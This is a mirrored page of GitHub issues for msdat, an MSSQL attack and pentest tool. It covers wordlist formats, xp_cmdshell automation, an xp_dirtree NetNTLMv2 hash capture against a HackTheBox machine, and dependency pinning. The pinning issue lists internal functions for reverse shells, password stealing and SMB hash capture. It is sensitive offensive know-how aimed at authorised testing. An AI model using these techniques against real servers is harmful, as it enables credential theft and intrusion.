Coder Social home page Coder Social logo

msdat's Issues

wordlist account format

what a format for wordlist accept by passwordguesser ?
in the example : sa/sa
what the meaning ? thank ..

xp_cmdshell Run Specific Command

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. It'd be nice if the xp_cmdshell module supported running a specific user provided command such as whoami rather than prompting for an interactive session/command. Both options WOULD be nice to have. Having this feature would allow us to more easily test plenty of MSSQL servers over running one at a time.

xp_dirtree Incorrect Result

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:
image

I used impacket-mssclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?

xp_cmdshell Restore Service to Identified State

My team uses msdat non-interactively against a ton of machines using GNU's parallel command. We like to check and see if xp_cmdshell can be executed. Currently xp_cmdshell allows the user to enable or disable the xp. However, I'd like to be able to restore the xp_cmdshell to how we found it so that I am not leaving xp_cmdshell enabled if was already disabled on client environments.

So the breakdown would be:

  1. If xp_cmdshell is disabled and can be enabled:
    1. Enable
    2. Execute
    3. Disable
  2. If xp_cmdshell is enabled:
    1. Execute

No module named pymssql

hi there, could you please help me with this
root@kali:/Downloads/mssql/msdat# ./msdat.py -h
Traceback (most recent call last):
File "./msdat.py", line 10, in
from Mssql import Mssql
File "/root/Downloads/mssql/msdat/Mssql.py", line 6, in
import pymssql, _mssql, decimal
ImportError: No module named pymssql
root@kali:/Downloads/mssql/msdat# pip3 install pymssql
Requirement already satisfied: pymssql in /usr/local/lib/python3.8/dist-packages (2.1.5)

Output/Log to File

I would like the tool to output results to file. Understanding this tool has many different modules, a standardized machine readable file type such as CSV may be difficult. However, having the tool output timestamps of actions and results would allow the tool to be run with persistent results. I see that something was started here, but was commented out:

#PPoutput.add_argument('--output-file',dest='outputFile',default=None,required=False,help='save results in this file')

Multiple Server Support

It would be cool if we added a flag such as -sL to run the intended module(s) against multiple servers at once. I am already wrapping msdat in a Bash script. This would be a line delimited text file of servers rather than a nmap input file.

I see that multiple hosts are supported for password guessing:

PPpassguesser.add_argument('-l', dest='hostlist', required=False, help='filename which contains hosts (one ip on each line: "ip:port" or "ip" only)')

Project dependencies may have API risk issues

Hi, In msdat, inappropriate dependency versioning constraints can cause risks.

Below are the dependencies and version constraints that the project is using

cython
colorlog
termcolor
pymssql
argparse
python-libnmap
argcomplete

The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict.
The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

After further analysis, in this project,
The version constraint of dependency cython can be changed to ==3.0.0a10.
The version constraint of dependency colorlog can be changed to >=0.1,<=0.4.
The version constraint of dependency colorlog can be changed to >=1.4,<=1.8.
The version constraint of dependency colorlog can be changed to >=6.3.0a1,<=6.6.0.
The version constraint of dependency argparse can be changed to >=1.2.1,<=1.4.0.
The version constraint of dependency argcomplete can be changed to >=0.1.7,<=0.7.1.

The above modification suggestions can reduce the dependency conflicts as much as possible,
and introduce the latest version as much as possible without calling Error in the projects.

The invocation of the current project includes all the following methods.

The calling methods from the cython 
queue.Queue
The calling methods from the colorlog 
colorlog.ColoredFormatter
The calling methods from the argparse 
argparse.ArgumentParser
argparse.ArgumentParser.parse_args
argparse.HelpFormatter
argparse.ArgumentParser.add_subparsers
The calling methods from the argcomplete 
argcomplete.autocomplete
The calling methods from the all methods 
iw.r.update
self.__saveThisLoginInFileIfNotExist__
self.args.close
Xpcmdshell.testAll
functools.reduce
next
LAST_RUN_OUTCOME.items
self.readFile
self.useThisDB
map
productVersion.append
self.tryToCaptureASmbAuthentication
search.searchInColumnNames.add_rows
argparse.ArgumentParser.testAll
self.nb.get
self.header
R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format
marked_width.m.rjust
socket.socket.connect
MssqlInfo.__getRemoteVersionThroughSQLServerBrowser__
TrustworthyPE.testAll
os.popen.read.split
Jobs.getInteractiveReverseShell
self.REQ_EXEC_SYS_CMD.format
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace.replace
Search
self.captureSMBAuthenticationViaXpDirtree
accounts.append
pymssql.connect
self.fd.write
join
Passwordstealer
self.getUsernamesViaSuserName
getHostsFromFile.append
self._splitit
self.REQ_OPENROWSET_REMOTE_CONNECTION.format
ScanPorts.scanAPort
socket.inet_aton
base64.b64encode
re.findall
bulkOpen.searchValideAccounts.append
self.reset
TrustworthyPE.TrustworthyPE.connect
BulkOpen.readFileViaOpenRowSet
self.REQ_READ_FILE.format
BulkOpen.remoteConnectionWithOpenrowset
self.__getUsernames__
Jobs.Jobs.testAll
Utils.generateUniqueName
math.ceil
self.writeFileBinary
_thread.exit
OleAutomation.putFile
bytes.fromhex
os.walk
usern.lower
hasattr
self.__getAnExampleOfValueForAColumn__
anAccount.startswith
threading.Thread.start
ports.split.append
self.set_chars
cells.append
self.args.execute
data.str.split
self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format
self.isFileExistViaXpFileexist
XpDirectory.listFilesViaXpDirtree
logging.getLogger.setLevel
signal.signal
self.execSP
self.waitSomeSecs
self._check_align
XpDirectory.isFileExistViaXpFileexist
datetime.datetime.now.strftime
range
self.REQ_GET_COLUMNS_IN_TABLES.format
argparse.HelpFormatter
SMBAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails
self.update
maxvalue.ETA.Bar.Percentage.ProgressBar.start
queue.Queue
repr
UsernameLikePassword.tryUsernameLikePassword
args.badNews
os.path.join
BulkOpen.closeConnection
isinstance
search.searchInColumnNames.draw
self.getJobs
self._compute_cols_width
Search.searchInColumnNames
PS_CMD_WRITE_CREATE.format
re.compile.match
usern.upper
self.REQ_USE_THIS_DB.format
marked_width.m.ljust
Jobs.testAll
XpDirectory.closeConnection
self.__getRemoteVersionThroughTDSResponse__
ScanPorts.scanAPort.start
currentFile.lower.endswith
threading.Thread.__init__
argparse.ArgumentParser.parse_args
re.compile.sub.extend
dict.badNews
Jobs.createAndExecuteJob
Utils.getStandardBarStarted
e.replace
argparse.ArgumentParser
self._has_border
logging.StreamHandler
Search.closeConnection
NC_CMD.format
self.marker.update
OleAutomation.OleAutomation
OleAutomation.getFile
self.stealHashedPasswords
self._format_marker
BulkOpen.readFileViaBulkinsert
strg.replace.replace
logging.StreamHandler.setFormatter
type
self.getCompleteVersion
os.popen
resultsToTable.append
ArraySizeError
self._hline
XpDirectory.testAll
anAccountIsGiven
fcntl.ioctl
getScreenSize
parser.parse_args.func
oleAutomation.putFile.encode
sorted
search.searchInColumnNames.count
runBulkInsertForGet
self.listDrivesViaXpAvailableMedia
datetime.datetime.now
runBulkInsertForRead
checkOptionsGivenByTheUser
BulkOpen
Utils.getPSReverseShellCodeEncoded
Passwordstealer.printPasswords
self.listDirectoriesViaXpSubdirs
self._build_hline
logging.info
Xpcmdshell.uploadFileWithPowershell
BulkOpen.searchValideAccounts
aRawData.base64.b64encode.decode
XpDirectory.createSubDiViaXpCreateSubdir
PasswordGuesser.searchValideAccounts
self.REQ_EXEC_SP_FOR_PE.format
max
ValueError
self.deleteSP
self._rows.append
self.__createJob__
self.readFileViaOpenRowSet
socket.socket.sendall
configureLogging
self.REQ_EXEC_JOB.format
OleAutomation.readFile
threading.Thread
UsernameLikePassword
argparse.ArgumentParser.add_subparsers
strg.replace
self.createAndExecuteJob
self._has_vlines.join
self.remoteConnectionWithOpenrowset
main
R_SHELL_COMMAND_POWERSHELL.format
MssqlInfo.returnPrintableStringFromDict
Percentage
ansi_keep.pop
self.__setJob__
self._has_hlines
parser.add_subparsers.add_parser
self._format_line
self.handle_resize
self.executeRequest
self.allUsernames.append
Search.isEmptyTable
re.compile.sub
Passwordstealer.stealHashedPasswords
self.__getJobStatusValue__
cleanString
pbar.percentage
time.time
format
Jobs.getJobStatus
argcomplete.autocomplete
BulkOpen.scanPortsWithOpenrowset
Jobs.printJobs
self._has_header
selectData.append
self.executeCmd
socket.socket
self.args.fetchall
Xpcmdshell.Xpcmdshell.testAll
struct.pack
self.tryPE
results.insert
self._len_cell
Utils.getScreenSize
range.append
Xpcmdshell.enableXpcmdshell
self.REQ_DROP_TABLE.format
texttable.Texttable.add_rows
getHostsFromFile
self.REQ_WRITE_FILE.format
OleAutomation.connect
enumerate
BulkOpen.getFileViaOpenRowSet
self.queueLock.acquire
self._check_row_size
OleAutomation.getInteractiveReverseShell
TrustworthyPE.TrustworthyPE
os.remove
self.OUTPUT_FORMAT_XP_DIRTREE.format
aHost.cleanString.split
self.VERSIONS.items
Passwordstealer.testAll
dict.bigTitle
self.__getAccounts__
self.nb.get.put
BulkOpen.disableAdHocDistributedQueries
self.getStandardBarStarted
anAccount.hex
print
self.args.title
Passwordstealer.closeConnection
self.__dropSysadminPriv__
self.captureSMBAuthenticationViaXpFileexist
texttable.Texttable.set_deco
self.isThe2005Version
pbar.update
SMBAuthenticationCapture.SMBAuthenticationCapture
strg.replace.replace.replace
re.compile
Xpcmdshell.closeConnection
socket.gethostbyname
utf16LEPayloadBytes.base64.b64encode.decode
MssqlInfo
list
self.getJobStatus
termcolor.colored
array.array
subparsers.add_parser.set_defaults
Mssql.Mssql
R_SHELL_COMMAND_POWERSHELL_PAYLOAD.format.encode
sys.exit
self.portStatusQueue.put
libnmap.parser.NmapParser.parse_fromfile
iter
runAllModules
self.output.printOSCmdOutput
PS_CMD_WRITE_APPEND.format
Mssql.Mssql.connect
Jobs
self.REQ_GET_COLUMNS_IN_VIEWS.format
values.append
self.REQ_XPCMDSHELL_CMD.format
open.write
self.__askToTheUserIfNeedToContinue__
UsernameLikePassword.runUsernameLikePassword
zip
line_wrapped.append
passwords.append
self.REQ_BULK_INSERT.format
anOperationHasBeenChosen
XpDirectory
runPasswordGuesserModuleOnAHost
Xpcmdshell.connect
str
Utils.ipOrNameServerHasBeenGiven
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_CREATE.format.replace
open
connectionInformation.keys
os.path.dirname
XpDirectory.connect
sys.stderr.write
Passwordstealer.Passwordstealer.testAll
TrustworthyPE.cleanPE
self.accounts.append
Exception.__init__
float
self.disableXpcmdshell
Jobs.Jobs
w.update
OleAutomation
Utils.databaseHasBeenGiven
OleAutomation.OleAutomation.testAll
Xpcmdshell.getInteractiveShell
texttable.Texttable
self.REQ_WRITE_FILE_BINARY.format
self.getRemoteDatabaseVersion
len
Utils.cleanString
Passwordstealer.Passwordstealer
self._str
dict
anAccount.endswith
self.REQ_XP_FILEEXIST.format
self.__dropTable__
args.title
Xpcmdshell.disableXpcmdshell
self.enableAdHocDistributedQueries
logging.getLogger
logging.critical
SMBAuthenticationCapture.captureSMBAuthenticationViaXpDirtree
SMBAuthenticationCapture.testAll
self.readFileViaBulkinsert
itertools.zip_longest
self.REQ_DROP_PRIV.format
OleAutomation.writeFile
portsQueue.join
int
SMBAuthenticationCapture.tryToCaptureASmbAuthentication
optik.textwrap.wrap
databases.append
currentFile.lower
Search.connect
args.goodNews
validAccountsList.items
r.append
Xpcmdshell.Xpcmdshell
time.strftime
ProgressBar
self.queueLock.release
self.__getRemoteVersionThroughSQLServerBrowser__
self.OUTPUT_MEDIA.format
self.isThe2012Version
open.read
self.REQ_STEP_JOB.format
input
self.disableAdHocDistributedQueries
PasswordGuesser.PasswordGuesser.searchValideAccounts
self.__searchPatternInColumnNamesOfViews__
SMBAuthenticationCapture
SMBAuthenticationCapture.SMBAuthenticationCapture.testAll
self.portsQueue.empty
input.lower
self.__searchPatternInColumnNamesOfTables__
OleAutomation.disableOLEAutomationProcedures
XpDirectory.XpDirectory
validAccounts.append
self.nb.put
socket.socket.recv
self.__createStoredProcToPE__
self.isCurrentUserSysadmin
self.format_time
self.__getPasswords__
TrustworthyPE.TrustworthyPE.testAll
argparse.ArgumentParser.add_argument
self.captureSMBAuthenticationViaXpGetFileDetails
self.createSubDiViaXpCreateSubdir
search.searchInColumnNames.set_deco
self._format_widgets
XpDirectory.listDrivesViaXpAvailableMedia
self.REQ_XP_CREATE_SUBDIR.format
self.__addJob__
OleAutomation.closeConnection
self.getCurrentUser
self.__isFileNotExist__
time.sleep
socket.socket.settimeout
OleAutomation.testAll
self.pbar.update
self.isThe2008Version
self.scannerObject.remoteConnectionWithOpenrowset
ScanPorts.ScanPorts.printScanPortResults
self.__execJob__
Utils.getBinaryDataFromFile
args.subtitle
BulkOpen.BulkOpen.testAll
self.REQ_CREATE_TABLE.format
runBulkInsertForGet.encode
socket.socket.sendto
ports.split
self.executeSysCmd
re.compile.sub.split
self.REQ_ADD_JOB.format
l.replace.replace.replace
self.__loadCompleteVersionIfNeed__
status.str.replace
BulkOpen.testAll
Xpcmdshell
args.unknownNews
portsQueue.put
l.cleanString.split
mssqlRawData.rfind
self._splitit.split
TrustworthyPE.isCurrentUserSysadmin
Utils.putDataToFile
self.__delJob__
hfill_inds.append
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace
SMBAuthenticationCapture.captureSMBAuthenticationViaXpFileexist
self.REQ_GET_VALUE_IN_COLUMN.format
self.percentage
OleAutomation.executeSysCmd
PasswordGuesser.getHostsFromFile
self.__loadAllUsernames__
Output.Output
self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format
self.REQ_CREATE_JOB.format
self.add_row
open.readlines
self._hline_header
self.__getTrustworthyDBs__
aService.service.lower
Passwordstealer.connect
self.enableXpcmdshell
open.close
XpDirectory.listDrivesViaXpFixedDrives
ScanPorts.ScanPorts.scanTcpPorts
self._draw_line
BulkOpen.BulkOpen.closeConnection
threading.Lock
BulkOpen.enableAdHocDistributedQueries
self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format
self._format_widgets.join.ljust
self.args.cursor
self.REQ_XP_SUBDIRS.format
Bar
Utils.checkOptionsGivenByTheUser
logging.Formatter
self.args.unknownNews
OleAutomation.enableOLEAutomationProcedures
time.gmtime
validUsers.append
SMBAuthenticationCapture.connect
Utils.getCredentialsFormated
Jobs.connect
ScanPorts.ScanPorts
self.OUTPUT_DRIVES.format
self.__createTable__
self._need_update
struct.unpack
self.__getJobStatus__
database.connectionInformation.append
BulkOpen.BulkOpen
self.writeFile
UsernameLikePassword.connect
os.path.isfile
os.path.isdir
ansi_keep.append
self.REQ_XP_DIRTREE.format
dict.title
self.REQ_STORED_PROC_TO_SYSADMIN.format
dict.goodNews
logging.debug
self.args.badNews
MssqlInfo.__getRemoteVersionThroughTDSResponse__
os.path.abspath
self.isThe2000Version
self.REQ_GET_STATUS.format
dict.items
self.REQ_OPENROWSET.format
ipOrNameServerHasBeenGiven
XpDirectory.listDirectoriesViaXpSubdirs
BulkOpen.connect
certificateBasedSQLServerLogins.append
l.replace.replace
pbar.finish
self.REQ_READ_LINES.format
self.cleanPE
TrustworthyPE.tryPE
ports.isdigit
os.mkdir
self.isThe2014Version
self._has_vlines
self.enableOLEAutomationProcedures
Utils.cleanString.replace
runOpenRowSetForGet
self.listDrivesViaXpFixedDrives
Utils.ErrorClass
self.REQ_IS_A_VALID_USERNAME.format
logging.getLogger.addHandler
TrustworthyPE.connect
TrustworthyPE
input.replace
ETA
parser.parse_args._get_kwargs
self.REQ_DEL_PROC.format
f.read.encode
self.REQ_DEL_JOB.format
random.randrange
list.extend
self.args.autocommit
cleanList.append
self.args.goodNews
aDictionary.items
aRawData.base64.b64encode.decode.remoteFilePath.PS_CMD_WRITE_APPEND.format.replace.replace
logging.warning
self.listFilesViaXpDirtree
self.args.subtitle
self.portsQueue.get
self.__getProductNameFromVersion__
BulkOpen.getFileViaBulkinsert
PasswordGuesser
self.REQ_GET_USERNAME.format
x.encode
askToContinue
colorlog.ColoredFormatter
SMBAuthenticationCapture.closeConnection
logging.error
iterable.__len__
Mssql.Mssql.__init__
runOpenRowSetForRead
PasswordGuesser.PasswordGuesser
self.portsQueue.task_done
os.popen.read
Mssql.Mssql.closeConnection
Passwordstealer.credentialsAreEmpty
texttable.Texttable.draw
usernames.append
subprocess.call

@developer
Could please help me check this issue?
May I pull a request to fix it?
Thank you very much.

License

Hello, my employer would like to use your code as a part of our penetration tests. Not to distribute, but use. Could you add an appropriate license to allow this OR at least provide a license to clarify your software usage? Thanks!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.